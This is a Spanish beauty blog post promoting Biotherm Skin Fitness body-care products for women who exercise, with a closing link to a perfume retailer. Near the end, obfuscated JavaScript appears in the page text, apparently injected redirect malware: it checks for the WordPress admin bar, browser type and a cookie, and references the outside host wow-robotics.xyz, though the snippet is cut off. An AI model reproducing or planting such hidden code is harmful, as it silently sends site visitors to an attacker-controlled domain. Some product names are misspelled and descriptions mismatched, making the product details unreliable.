A pesar de que midas tu alimentación y procures llevar una vida sana practicando deporte… ¿Estás segura de estar cuidándote? Durante la actividad física el cuerpo pierde agua y minerales que luego perjudica nuestra piel. Quédate y averigua qué puedes hacer para mimar tu piel si tienes un ritmo de vida acelerado.

Biotherm Skin Fitness es un nuevo concepto de tratamiento corporal que está específicamente diseñado para aquellas mujeres que no paran en todo el día o que tienen una actividad física intensa. Los productos de Skin Fitness actúan como potenciador del efecto tonificante del ejercicio físico; hidratando en profundidad la piel y reparándola tras el impacto que sufre debido al deporte.

PRODUCTRANGE

Las mujeres que practican deporte a diario tienden a tener la piel más seca. Los rayos UV, el frío, el viento y la fricción de la ropa contra el cuerpo pueden provocar tirantez y sequedad a la piel.

a

Instant Smoothing & Moisturizing Body Treatment es un gel ligero que mejora la textura de la piel e hidrata todo el cuerpo. Este hidratante devuelve a la piel su luz y suavidad natural. Instant Smoothing & Moisturizing Body Treatment está formulado para su aplicación sobre brazos, piernas e incluso codos y rodillas.

Instant Smoothing Body Treatment

Toda mujer activa necesita una ducha relajante tras un día largo o una sesión intensa de deporte. La sal y las bacterias provocadas por la transpiración pueden engrosar la piel y provocar la obstrucción de los poros e irritación.
skin fitness

Firmiing & Recovery Body Emulsion es un tratamiento corporal de limpieza que purifica y suaviza la piel eliminando las toxinas resultantes del ejercicio físico. Este gel está enriquecido con AHAs y Espirulina. Esta mousse limpiadora permite una piel limpia, cuidada y suave.

skin fitness biothem

Tras una sesión de deporte, es imprescindible cuidar la piel para su correcta recuperación; no solo nos ayudará a tener una piel suave y bonita, sino que también podremos potenciar la tonificación ganada en la sesión de ejercicio físico.

skin fitness

Purifying & Cleansing Body Foam es un jabón enriquecido con Alcanfor, Magnesio y Sodio. La formulación de este gel recupera y calma a la vez que activa la micro-circulación de la piel.  Con este producto, la piel se tonifica,  ya que potencia los beneficios del ejercicio físico.

skin fitness

Podrás encontrar la gama de Biotherm y otros productos de la marca en perfumestintin.com además de las mejores marcas en belleza y perfumería.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone